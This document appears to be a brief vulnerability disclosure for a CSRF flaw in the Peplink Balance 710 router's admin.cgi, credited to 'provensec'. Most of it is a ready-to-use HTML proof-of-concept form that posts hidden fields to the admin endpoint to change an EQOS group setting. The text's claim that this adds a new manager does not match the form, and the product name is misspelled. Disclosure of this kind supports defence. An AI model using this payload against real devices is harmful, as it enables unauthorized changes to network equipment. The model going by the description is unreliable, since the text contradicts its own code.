??# Affected software: paperlink balance 710 # Type of vulnerability:csrf # URL:peplink.com <http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi> # Discovered by: provensec # Website: provensec.com #version:710 # Proof of concept? a new manager can be added using csrf attack <html> <body> <form action="http://balancedemo.peplink.com/cgi-bin/MANGA/admin.cgi" method="POST"> <input type="hidden" name="section" value="EQOS_group_modify" /> <input type="hidden" name="rule_id" value="" /> <input type="hidden" name="iptype" value="0" /> <input type="hidden" name="ipaddr" value="123.123.1.23" /> <input type="hidden" name="netmask" value="24" /> <input type="hidden" name="group" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html>?